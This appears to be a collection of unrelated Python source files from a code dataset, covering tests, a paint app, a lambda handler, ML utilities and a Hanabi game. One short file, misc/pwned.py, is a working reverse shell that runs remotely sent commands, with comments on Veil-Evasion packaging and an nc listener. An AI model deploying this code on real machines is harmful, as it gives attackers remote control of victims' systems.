setattr(self, k, v)
def from_fixture(file_name):
with open(file_name) as twilio_response:
phone_dict = json.load(twilio_response)
return MockTwilioLookup(phone_dict)
class TestTwilioResponse(TestCase):
def create_app(self):
app = create_app(self)
app.config['TESTING'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql+psycopg2://eviction_tracker_test:junkdata@localhost:5432/eviction_tracker_test'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
return app
def setUp(self):
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
def test_insert_phone_with_caller_name(self):
'''
Testing json response with caller_name but null carrier
'''
twilio_response = MockTwilioLookup.from_fixture(
'tests/fixtures/phone_number_with_caller_name.json')
phone_number = PhoneNumberVerification.from_twilio_response(
twilio_response)
db.session.add(phone_number)
db.session.commit()
phone_number_entry = db.session.query(PhoneNumberVerification).first()
self.assertEqual(
twilio_response.caller_name['caller_name'], phone_number_entry.caller_name)
self.assertEqual(
twilio_response.caller_name['caller_type'], phone_number_entry.caller_type)
self.assertEqual(
twilio_response.caller_name['error_code'], phone_number_entry.name_error_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.carrier_error_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.mobile_country_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.mobile_network_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.carrier_name)
self.assertEqual(twilio_response.carrier,
phone_number_entry.phone_type)
self.assertEqual(twilio_response.country_code,
phone_number_entry.country_code)
self.assertEqual(twilio_response.national_format,
phone_number_entry.national_format)
self.assertEqual(twilio_response.phone_number,
phone_number_entry.phone_number)
def test_insert_phone_missing_caller_name(self):
'''
Testing json response with carrier but null caller_name
'''
twilio_response = MockTwilioLookup.from_fixture(
'tests/fixtures/phone_number_missing_caller_name.json')
phone_number = PhoneNumberVerification.from_twilio_response(
twilio_response)
output_missing_name = PhoneNumberVerification.from_twilio_response(
twilio_response)
db.session.add(output_missing_name)
db.session.commit()
phone_number_entry = db.session.query(PhoneNumberVerification).first()
self.assertEqual(twilio_response.caller_name,
phone_number_entry.caller_name)
self.assertEqual(twilio_response.caller_name,
phone_number_entry.caller_type)
self.assertEqual(twilio_response.caller_name,
phone_number_entry.name_error_code)
self.assertEqual(
twilio_response.carrier['error_code'], phone_number_entry.carrier_error_code)
self.assertEqual(
twilio_response.carrier['mobile_country_code'], phone_number_entry.mobile_country_code)
self.assertEqual(
twilio_response.carrier['mobile_network_code'], phone_number_entry.mobile_network_code)
self.assertEqual(twilio_response.carrier['name'],
phone_number_entry.carrier_name)
self.assertEqual(twilio_response.carrier['type'],
phone_number_entry.phone_type)
self.assertEqual(twilio_response.country_code,
phone_number_entry.country_code)
self.assertEqual(twilio_response.national_format,
phone_number_entry.national_format)
self.assertEqual(twilio_response.phone_number,
phone_number_entry.phone_number)
def test_insert_phone_with_all_data(self):
'''
Testing json response with caller_name but null carrier
'''
twilio_response = MockTwilioLookup.from_fixture(
'tests/fixtures/phone_number_with_all_data.json')
phone_number = PhoneNumberVerification.from_twilio_response(
twilio_response)
db.session.add(phone_number)
db.session.commit()
phone_number_entry = db.session.query(PhoneNumberVerification).first()
self.assertEqual(
twilio_response.caller_name['caller_name'], phone_number_entry.caller_name)
self.assertEqual(
twilio_response.caller_name['caller_type'], phone_number_entry.caller_type)
self.assertEqual(
twilio_response.caller_name['error_code'], phone_number_entry.name_error_code)
self.assertEqual(
twilio_response.carrier['error_code'], phone_number_entry.carrier_error_code)
self.assertEqual(
twilio_response.carrier['mobile_country_code'], phone_number_entry.mobile_country_code)
self.assertEqual(
twilio_response.carrier['mobile_network_code'], phone_number_entry.mobile_network_code)
self.assertEqual(twilio_response.carrier['name'],
phone_number_entry.carrier_name)
self.assertEqual(twilio_response.carrier['type'],
phone_number_entry.phone_type)
self.assertEqual(twilio_response.country_code,
phone_number_entry.country_code)
self.assertEqual(twilio_response.national_format,
phone_number_entry.national_format)
self.assertEqual(twilio_response.phone_number,
phone_number_entry.phone_number)
| 2.515625 | 3 |
misc/pwned.py | benhunter/py-stuff | 3 | 12773177 | # Open a reverse shell when executed on a victim computer.
import socket
import subprocess
HOST = "127.0.0.1"
PORT = 31337
sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockobj.connect((HOST, PORT))
while 1:
data = sockobj.recv(4096) # returns a bytes object
# don't forget to decode the bytes to str
proc = subprocess.Popen(data.decode(), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
sockobj.send(result)
# sockobj.close() # unreachable code
# Veil-Evasion make .py to .exe
# auxilary/pyinstaller-wrapper
# connect to nc (Windows)
# nc -L -p 31337 -v
| 2.65625 | 3 |
model/model.py | ddl-aambekar/model | 0 | 12773178 | <reponame>ddl-aambekar/model<filename>model/model.py
# This is a sample Python model
# Import dependencies
import random
# Define a helper function to generate a random number:
def random_number(start, stop):
return random.uniform(start, stop)
# Define a function to create an API
# To call, use {"data": {"start": 1, "stop": 100}}
# Learn more at http://support.dominodatalab.com/hc/en-us/articles/204173149
def my_model(start, stop):
return dict(a_random_number=random_number(start, stop))
| 3.0625 | 3 |
paint app/main.py | KhamisiKibet/Kivy | 0 | 12773179 | ########################################################################
## SPINN DESIGN CODE
# YOUTUBE: (SPINN TV) https://www.youtube.com/spinnTv
# WEBSITE: spinndesign.com
# TUTORIAL: KIVY
########################################################################
########################################################################
## IMPORTS
########################################################################
from random import random
# Import kivy app
from kivy.app import App
# Import kivy widget
from kivy.uix.widget import Widget
# Import kivy button
from kivy.uix.button import Button
# Import graphics
from kivy.graphics import Color, Ellipse, Line
########################################################################
## PAINT WIDGET CLASS
########################################################################
class MyPaintWidget(Widget):
# Touch event listener
def on_touch_down(self, touch):
# Create random color
color = (random(), 1, 1)
# Draw
with self.canvas:
Color(*color, mode='hsv')
# Ellipse size
d = 30.
# draw Ellipse
Ellipse(pos=(touch.x - d / 2, touch.y - d / 2), size=(d, d))
# Create touch points/ draw line
touch.ud['line'] = Line(points=(touch.x, touch.y))
def on_touch_move(self, touch):
# Add touch points to draw a line
touch.ud['line'].points += [touch.x, touch.y]
########################################################################
## MAIN CLASS
########################################################################
class MyPaintApp(App):
# Build app UI
def build(self):
# Parent widget
parent = Widget()
# Painter Widget
self.painter = MyPaintWidget()
# Clear button
clearbtn = Button(text='Clear')
# Bind button event
clearbtn.bind(on_release=self.clear_canvas)
# Add widgets to parent
parent.add_widget(self.painter)
parent.add_widget(clearbtn)
# Return parent
return parent
# A function to clear the canvas
def clear_canvas(self, obj):
self.painter.canvas.clear()
########################################################################
## RUN THE APP
########################################################################
if __name__ == '__main__':
MyPaintApp().run()
########################################################################
## <== END ==>
######################################################################## | 2.453125 | 2 |
parseridge/parser/training/hyperparameters.py | jgontrum/parseridge | 6 | 12773180 | from copy import deepcopy
from dataclasses import dataclass
from parseridge.utils.logger import LoggerMixin
"""
TODO
[ ] Group the parameters
[ ] Add save to / load from YAML
[x] Add overwrite method from kwargs
"""
@dataclass
class Hyperparameters(LoggerMixin):
"""
Container for the various hyper-parameters used in the training process.
They are stored here to keep the code in the trainer clean.
"""
learning_rate: float = 1e-3
batch_size: int = 4
error_probability: float = 0.1
oov_probability: float = 0.25
margin_threshold: float = 2.5
token_dropout: float = 0.01
loss_function: str = "CrossEntropy" # See Criterion.LOSS_FUNCTIONS
def update(self, **kwargs):
new_object = deepcopy(self)
for parameter_name, value in kwargs.items():
if not parameter_name.startswith("_") and hasattr(new_object, parameter_name):
setattr(new_object, parameter_name, value)
else:
self.logger.warning(f"Cannot update value for '{parameter_name}'.")
return new_object
| 2.65625 | 3 |
Python-Chaptering/Chapter-4/7-testFastFlux.py | JARVIS-AI/python-codes | 8 | 12773181 | <gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
dnsRecords = {}
def handlePkt(pkt):
if pkt.haslayer(DNSRR):
rrname = pkt.getlayer(DNSRR).rrname
rdata = pkt.getlayer(DNSRR).rdata
if dnsRecords.has_key(rrname):
if rdata not in dnsRecords[rrname]:
dnsRecords[rrname].append(rdata)
else:
dnsRecords[rrname] = []
dnsRecords[rrname].append(rdata)
def main():
pkts = rdpcap('fastFlux.pcap')
for pkt in pkts:
handlePkt(pkt)
for item in dnsRecords:
print '[+] '+item+' has '+str(len(dnsRecords[item])) \
+ ' unique IPs.'
if __name__ == '__main__':
main()
| 2.6875 | 3 |
test_profanity_check.py | rnegron/django-profanity-check | 0 | 12773182 | import pytest
from profanity.templatetags.profanity import censor
@pytest.mark.parametrize("word", ["fuck", "shit", "cunt", "ass"])
def test_censors_profane_words(word):
assert censor(word) == ("*" * len(word))
@pytest.mark.parametrize("word", ["fudge", "poop", "baddie", "butt"])
def test_does_not_censor_other_words(word):
assert censor(word) == word
@pytest.mark.parametrize(
"sentence",
[
"Fuck you!",
"You are a piece of shit",
"Wow, what a cunt.",
"Thanks for being an asshole",
],
)
def test_censors_words_in_sentences(sentence):
assert "*" in censor(sentence)
@pytest.mark.parametrize(
"sentence",
[
"Screw you!",
"You are a bad person",
"Wow, what a doodoo head",
"Thanks for being a meanie",
],
)
def test_does_not_censor_other_words_in_sentences(sentence):
assert sentence == censor(sentence)
| 2.75 | 3 |
leds/views.py | alyoshenka/DjangoSite | 0 | 12773183 | from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
import json
from .models import Color, Board, LED
def index(request):
"""Homepage"""
all_colors = Color.objects.all() # change to selected colors
all_boards = Board.objects.all() # change to selected boards
try:
current_color_label = request.session['current_color']
except:
current_color_label = None
try:
current_board_label = request.session['current_board']
current_board = Board.objects.get(label=current_board_label)
current_arr = current_board.display_arr()
except:
current_board = None
current_arr = None
context = {
'current_arr': current_arr,
'colors': all_colors,
'boards': all_boards,
'current_color': current_color_label,
'current_board': current_board
}
return render(request, 'leds/index.html', context)
def color(request, color_name):
"""Displays information for a given color"""
color = get_object_or_404(Color, label=color_name)
context = {
'color': color
}
return render(request, 'leds/color.html', context)
def board(request, board_label):
"""Displays information for a given board"""
board = get_object_or_404(Board, label=board_label)
arr = board.display_arr()
context = { 'board': board, 'arr': arr }
return render(request, 'leds/board.html', context)
def all_colors(request):
"""Show all the colors"""
all_colors = Color.objects.all()
context = {
'all_colors': all_colors
}
return render(request, 'leds/all_colors.html', context)
def all_boards(request):
"""Show all boards"""
all_boards = Board.objects.all()
context = { 'all_boards': all_boards }
return render(request, 'leds/all_boards.html', context)
def set_led_color(request, board_label, led_idx, color_label):
board = Board.objects.get(label=board_label)
led = board.leds[led_idx]
color = Color.objects.get(label=color_label)
led.color = color
led.save()
return HttpResponseRedirect(reverse('leds:boards', args=(board_label,)))
# session testing
def selected_color(request):
"""Get selected color from session"""
_label = request.session['current_color']
color = None if _label == 'none' else Color.objects.get(label=_label)
return color
def LED_click(request, led_index):
"""An LED in a board is clicked
set LED color"""
# get selected color
# find associated color by label
color = selected_color(request)
# get currently displayed board in session
try:
board_label = request.session['current_board']
board = Board.objects.get(label=board_label)
except:
board = None
if color is not None and board is not None:
# find LED associated to button (by idx)
# and board
led = LED.objects.get(index=led_index, board=board)
# set LED color to color
led.color = color
# save
led.save()
print('set ', led_index, ' to ', color)
# return to original page
return HttpResponseRedirect(reverse('leds:index'))
def color_click(request, color_label):
"""A displayed color is clicked
select color"""
color = Color.objects.get(label=color_label)
obj = json.loads(color.json())[0]
label = obj.get('fields').get('label')
if not 'current_color' in request.session:
request.session['current_color'] = 'none'
elif request.session['current_color'] == label:
request.session['current_color'] = 'none'
else:
request.session['current_color'] = label
# return HttpResponse(request.session['current_color'])
return HttpResponseRedirect(reverse('leds:index'))
def board_click(request, board_label):
"""A displayed board is clicked
select board"""
board = Board.objects.get(label=board_label)
obj = json.loads(board.json())[0]
label = obj.get('fields').get('label')
if not 'current_board' in request.session:
request.session['current_board'] = 'none'
elif request.session['current_board'] == label:
request.session['current_board'] = 'none'
else:
request.session['current_board'] = label
#return HttpResponse(request.session['current_board'])
return HttpResponseRedirect(reverse('leds:index'))
| 2.359375 | 2 |
cmd/lambda/users/main.py | forstmeier/numermatic | 0 | 12773184 | <filename>cmd/lambda/users/main.py
import json
import os
import time
import uuid
import boto3
def handler(event, context):
print('event:', event)
user_id = str(uuid.uuid4().hex)
body = json.loads(event['body'])
dynamodb = boto3.client('dynamodb')
try:
put_item_response = dynamodb.put_item(
TableName=os.getenv('USERS_TABLE_NAME'),
Item={
'id': {
'S': user_id,
},
'email': {
'S': body['email'],
},
'timestamp': {
'N': str(time.time()),
}
}
)
return {
'body': json.dumps({
'message': 'successfully created user',
'user_id': user_id,
}),
'statusCode': 200,
'isBase64Encoded': False,
}
except Exception as e:
print('exception:', e)
return {
'body': str(e),
'statusCode': 500,
'isBase64Encoded': False,
}
| 2.203125 | 2 |
src/config.py | Biano-AI/serving-compare-middleware | 6 | 12773185 | <filename>src/config.py<gh_stars>1-10
# -*- encoding: utf-8 -*-
# ! python3
from __future__ import annotations
from pydantic import AnyUrl, BaseSettings
class Settings(BaseSettings):
tfserving_service_url: AnyUrl
torchserve_service_url: AnyUrl
triton_service_host: str
tfserving_grpc_host: str = "localhost:9000"
torchserve_grpc_host: str = "localhost:7070"
triton_grpc_host: str = "localhost:XXXX"
class Config:
env_file = ".env"
| 1.6875 | 2 |
Professor/apps.py | AlirezAkbary/FeedbackSys | 0 | 12773186 | from django.apps import AppConfig
class ProfessorConfig(AppConfig):
name = 'Professor'
| 1.351563 | 1 |
octopus/config/cli.py | tuub/magnificent-octopus | 0 | 12773187 | <filename>octopus/config/cli.py<gh_stars>0
# command names and paths to scripts that can be run through the standard runner
CLI_SCRIPTS = {
"usermod" : "octopus.modules.account.scripts.UserMod"
} | 1.375 | 1 |
paper_notebooks/temp_ktica.py | andrewlferguson/hde | 5 | 12773188 | import numpy as np, pyemma as py
# from msmbuilder.decomposition.tica import tICA
from sklearn.kernel_approximation import Nystroem
class Kernel_tica(object):
def __init__(self, n_components, lag_time,
gamma, # gamma value for rbf kernel
n_components_nystroem=100, # number of components for Nystroem kernel approximation
landmarks = None,
shrinkage = None,
weights='empirical' # if 'koopman', use Koopman reweighting for tICA (see Wu, Hao, et al. "Variational Koopman models: slow collective variables and molecular kinetics from short off-equilibrium simulations." The Journal of Chemical Physics 146.15 (2017): 154104.)
):
self._n_components = n_components
self._lag_time = lag_time
self._n_components_nystroem = n_components_nystroem
self._landmarks = landmarks
self._gamma = gamma
self._nystroem = Nystroem(gamma=gamma, n_components=n_components_nystroem)
self._weights = weights
# self._tica = tICA(n_components=n_components, lag_time=lag_time, shrinkage=shrinkage)
self._shrinkage = shrinkage
return
def fit(self, sequence_list):
if self._landmarks is None:
self._nystroem.fit(np.concatenate(sequence_list))
else:
print("using landmarks")
self._nystroem.fit(self._landmarks)
sequence_transformed = [self._nystroem.transform(item) for item in sequence_list]
# define tica object at fit() with sequence_list supplied for initialization, as it is required by
# Koopman reweighting
self._tica = py.coordinates.tica(sequence_transformed, lag=self._lag_time,
dim=self._n_components, kinetic_map=True,
weights=self._weights)
return
def transform(self, sequence_list):
return self._tica.transform(
[self._nystroem.transform(item) for item in sequence_list])
def fit_transform(self, sequence_list):
self.fit(sequence_list)
return self.transform(sequence_list)
def score(self, sequence_list):
model = self.__class__(n_components = self._n_components, lag_time=self._lag_time, gamma=self._gamma,
n_components_nystroem=self._n_components_nystroem, landmarks=self._landmarks,
shrinkage=self._shrinkage)
model.fit(sequence_list)
return np.sum(model._tica.eigenvalues)
| 2.421875 | 2 |
tests/test_transition.py | takuseno/kiox | 2 | 12773189 | <reponame>takuseno/kiox
from collections import deque
import numpy as np
from kiox.episode import EpisodeManager
from kiox.step import StepBuffer
from kiox.transition import FrameStackLazyTransition, SimpleLazyTransition
from kiox.transition_buffer import UnlimitedTransitionBuffer
from .utility import StepFactory
def test_simple_lazy_transition():
factory = StepFactory()
step_buffer = StepBuffer()
episode_manager = EpisodeManager(step_buffer, UnlimitedTransitionBuffer())
step1 = episode_manager.append_step(factory())
step2 = episode_manager.append_step(factory(terminal=True))
# test transition
lazy_transition1 = SimpleLazyTransition(
curr_idx=step1.idx,
next_idx=step2.idx,
multi_step_reward=1.0,
duration=1,
)
transition = lazy_transition1.create(step_buffer)
assert np.all(transition.observation == step1.observation)
assert np.all(transition.next_observation == step2.observation)
assert transition.reward == 1.0
assert transition.terminal == 0.0
assert transition.duration == 1
# test terminal transition
lazy_transition2 = SimpleLazyTransition(
curr_idx=step2.idx,
next_idx=None,
multi_step_reward=1.0,
duration=1,
)
transition = lazy_transition2.create(step_buffer)
assert np.all(transition.observation == step2.observation)
assert np.all(transition.next_observation == 0.0)
assert transition.reward == 1.0
assert transition.terminal == 1.0
assert transition.duration == 1
def test_frame_stack_lazy_transition():
factory = StepFactory(observation_shape=(1, 84, 84))
step_buffer = StepBuffer()
episode_manager = EpisodeManager(step_buffer, UnlimitedTransitionBuffer())
steps = []
prev_idx = deque(maxlen=4)
frames = deque(maxlen=4)
for _ in range(4):
frames.append(np.zeros((1, 84, 84)))
for i in range(9):
step = episode_manager.append_step(factory())
steps.append(step)
prev_idx.append(step.idx)
frames.append(step.observation)
if i > 0:
lazy_transition = FrameStackLazyTransition(
curr_idx=steps[i - 1].idx,
next_idx=steps[i].idx,
multi_step_reward=1.0,
duration=1,
n_frames=3,
prev_frames=list(prev_idx)[:-2],
)
transition = lazy_transition.create(step_buffer)
ref_observation = np.vstack(list(frames)[:-1])
ref_next_observation = np.vstack(list(frames)[1:])
assert transition.observation.shape == (3, 84, 84)
assert transition.next_observation.shape == (3, 84, 84)
assert np.all(transition.observation == ref_observation)
assert np.all(transition.next_observation == ref_next_observation)
assert transition.reward == 1.0
assert transition.terminal == 0.0
assert transition.duration == 1
step = episode_manager.append_step(factory(terminal=True))
steps.append(step)
prev_idx.append(step.idx)
frames.append(step.observation)
# test terminal transition
lazy_transition = FrameStackLazyTransition(
curr_idx=steps[-1].idx,
next_idx=None,
multi_step_reward=1.0,
duration=1,
n_frames=3,
prev_frames=list(prev_idx)[1:-1],
)
transition = lazy_transition.create(step_buffer)
ref_observation = np.vstack(list(frames)[1:])
ref_next_observation = np.zeros((3, 84, 84))
assert np.all(transition.observation == ref_observation)
assert np.all(transition.next_observation == ref_next_observation)
assert transition.reward == 1.0
assert transition.terminal == 1.0
assert transition.duration == 1
| 2.0625 | 2 |
test/unit/builders/test_custom.py | jimporter/mopack | 0 | 12773190 | import os
import subprocess
from unittest import mock
from . import BuilderTest, MockPackage, through_json
from .. import mock_open_log
from mopack.builders import Builder
from mopack.builders.custom import CustomBuilder
from mopack.iterutils import iterate
from mopack.path import Path
from mopack.shell import ShellArguments
from mopack.usage.pkg_config import PkgConfigUsage
class TestCustomBuilder(BuilderTest):
builder_type = CustomBuilder
def check_build(self, builder, build_commands=None, *, submodules=None,
usage=None):
if usage is None:
pcfiles = ['foo']
pcfiles.extend('foo_{}'.format(i) for i in iterate(submodules))
usage = {'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': pcfiles,
'extra_args': []}
if build_commands is None:
builddir = os.path.join(self.pkgdir, 'build', builder.name)
build_commands = [i.fill(srcdir=self.srcdir, builddir=builddir)
for i in builder.build_commands]
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
mock.patch('subprocess.run') as mcall: # noqa
builder.build(self.pkgdir, self.srcdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'foo.log'
), 'a')
for line in build_commands:
mcall.assert_any_call(line, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True, check=True)
self.assertEqual(builder.get_usage(
MockPackage(), submodules, self.pkgdir, self.srcdir
), usage)
def test_basic(self):
builder = self.make_builder('foo', build_commands=[
'configure', 'make'
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure']),
ShellArguments(['make']),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
def test_build_list(self):
builder = self.make_builder('foo', build_commands=[
['configure', '--foo'], ['make', '-j2']
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', '--foo']),
ShellArguments(['make', '-j2']),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
def test_path_objects(self):
opts = self.make_options()
builder = self.make_builder('foo', build_commands=[
'configure $srcdir/build',
['make', '-C', '$builddir'],
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
ShellArguments(['make', '-C', Path('', 'builddir')]),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=opts, _path_bases=self.path_bases
))
self.check_build(builder, build_commands=[
['configure', self.srcdir + '/build'],
['make', '-C', os.path.join(self.pkgdir, 'build', 'foo')],
])
def test_deploy(self):
builder = self.make_builder('foo', build_commands=['make'],
deploy_commands=['make install'],
usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['make']),
])
self.assertEqual(builder.deploy_commands, [
ShellArguments(['make', 'install']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
mock.patch('subprocess.run') as mcall: # noqa
builder.deploy(self.pkgdir, self.srcdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'deploy', 'foo.log'
), 'a')
mcall.assert_called_with(
['make', 'install'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True,
check=True
)
def test_cd(self):
opts = self.make_options()
builder = self.make_builder('foo', build_commands=[
'configure $srcdir/build',
'cd $builddir',
'make',
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
ShellArguments(['cd', Path('', 'builddir')]),
ShellArguments(['make']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=opts, _path_bases=self.path_bases
))
with mock.patch('os.chdir') as mcd:
builddir = os.path.join(self.pkgdir, 'build', 'foo')
self.check_build(builder, build_commands=[
['configure', self.srcdir + '/build'],
['make'],
])
mcd.assert_called_once_with(builddir)
def test_cd_invalid(self):
builder = self.make_builder('foo', build_commands=[
'cd foo bar',
], usage='pkg_config')
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
self.assertRaises(RuntimeError): # noqa
builder.build(self.pkgdir, self.srcdir)
def test_usage_full(self):
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'path': 'pkgconf'}
)
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['make']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', path='pkgconf', submodules=None,
_options=self.make_options(), _path_bases=self.path_bases
))
self.check_build(builder, usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
'extra_args': [],
})
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
builder = self.make_builder(
'foo', build_commands=['make'], usage='pkg_config',
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', build_commands=['make'], usage='pkg_config',
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'])
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
def test_clean(self):
builder = self.make_builder('foo', build_commands=['make'],
usage='pkg_config')
srcdir = os.path.join(self.pkgdir, 'build', 'foo')
with mock.patch('shutil.rmtree') as mrmtree:
builder.clean(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
def test_rehydrate(self):
opts = self.make_options()
builder = CustomBuilder('foo', build_commands=['make'],
submodules=None, _options=opts)
builder.set_usage({'type': 'pkg_config', 'path': 'pkgconf'},
submodules=None)
data = through_json(builder.dehydrate())
self.assertEqual(builder, Builder.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'type': 'custom', '_version': 0, 'name': 'foo',
'build_commands': [], 'deploy_commands': None,
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(CustomBuilder, 'upgrade',
side_effect=CustomBuilder.upgrade) as m:
pkg = Builder.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, CustomBuilder)
m.assert_called_once()
| 2.234375 | 2 |
tiny_hanabi/game/settings.py | ssokota/tiny-hanabi | 8 | 12773191 | <reponame>ssokota/tiny-hanabi
"""Learning settings for decentralized control. Most obvious setting is the
DecPOMDP, in which multiple learners interact with the environment. Other
settings are various ways of centralized the learning problem. In these
settings, a single agent dictates the policy of all players. Inheritance
structure is:
Game:
-> DecPOMDP : For multi-agent learning algorithms
-> PuBMDP : For single-agent learning algorithms
(exploits public knowledge)
-> TBMDP : For single-agent learning algorithms
(exploits temporal knowledge)
-> VBMDP : For single-agent learning algorithms
(exploits vacuous knowledge)
"""
from abc import ABC, abstractmethod
from enum import Enum
import itertools
from typing import Optional, Union, Dict
import numpy as np
statetype = Union[None, int, tuple]
class Settings(Enum):
decpomdp = "decpomdp"
pubmdp = "pubmdp"
tbmdp = "tbmdp"
vbmdp = "vbmdp"
class Game(ABC):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Base class for games
Args:
payoffs: Payoff matrix indexed card1, card2, action1, action2
optimal_return: Expected return of an optimal joint policy
Attributes:
num_cards (int): The number of cards in the deck
num_actions (int): The number of actions available to each player
history: (list): The events that have occurred so far
Note that this is NOT a history in a technical sense, it is
a list of information required for agents to perform updates.
num_players (int): The number of players in the game. It may either
be two or one depending on the setting so it is initialized
to `None` in the base class.
horizon (int): The length of terminal histories. It varies from
two to four depending on the setting so it is initialized to
`None` in the base class.
payoffs: See args
optimal_return: See args
"""
self.num_cards = payoffs.shape[0]
self.num_actions = payoffs.shape[-1]
self.reset()
self.num_players = 0
self.horizon = 0
self.payoffs = payoffs
self.optimal_return = optimal_return
@abstractmethod
def start_states(self) -> tuple:
"""Return tuple of start states for the game"""
def random_start(self) -> None:
"""Initialize history at random start state (each is equiprobable)"""
start_states = self.start_states()
self.history = start_states[np.random.choice(range(len(start_states)))]
def is_terminal(self) -> bool:
"""Checks whether the game is over"""
return len(self.history) == self.horizon
def payoff(self) -> float:
"""Return the reward for the current history
In Tiny Hanabi games the reward is zero unless the history is terminal
"""
return self.payoffs[tuple(self.history)] if self.is_terminal() else 0.0
@abstractmethod
def step(self, action: int) -> None:
"""Process the player's action"""
@abstractmethod
def num_legal_actions(self) -> int:
"""Return the number of legal actions at the current history"""
@abstractmethod
def context(self) -> statetype:
"""Return the context required by the acting player"""
@abstractmethod
def episode(self) -> list:
"""Return information about the current episode's trajectory"""
def reset(self, history: Optional[list] = None) -> None:
"""Reset the game to `history` or a random start state
Args:
history: History to reset the game to; `None` means random start
"""
if history is None:
self.random_start()
else:
self.history = history
class DecPOMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float):
"""Decentralized partially observable Markov decision process
Args:
See base class
Attributes:
See base class
"""
super().__init__(payoffs, optimal_return)
self.num_players = 2
self.horizon = 4
def start_states(self) -> tuple:
"""Returns tuple of possible deals [card1, card2]"""
return tuple(
[i, j] for i in range(self.num_cards) for j in range(self.num_cards)
)
def step(self, action: int) -> None:
"""Appends `action` to `history`"""
self.history.append(action)
def num_legal_actions(self) -> int:
"""Return the number of legal actions at the current history"""
return self.num_actions
def context(self) -> tuple:
"""Return the history (agent must parse into infostate)"""
return tuple(self.history)
def episode(self) -> list:
"""Return the history and the payoff"""
return self.history + [self.payoff()]
class PuBMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Public belief Markov decision process
Args:
See base class
Attributes:
See base class
payoffs (dict): The payoffs for the PuB-MDP
beliefs (dict): Maps a tuple of the first action and first
prescription to the corresponding public belief state.
"""
super().__init__(payoffs, optimal_return)
self.num_players = 1
self.horizon = 4
self.build(payoffs)
def start_states(self) -> tuple:
"""Return the start states
The start states are the deals to player 1.
"""
return tuple([c] for c in range(self.num_cards))
def step(self, prescription: int) -> None:
"""Update the game given the prescription
For the first time step, the game picks player 1's action according to
prescription and the deal for player one. It adds the prescription and
the corresponding belief state to the history. For the second time
step, the game appends the prescription to the history.
Args:
prescription: The coordinator's action
"""
if len(self.history) == 1:
prescription1_table = table_repr(
prescription, self.num_cards, self.num_actions
)
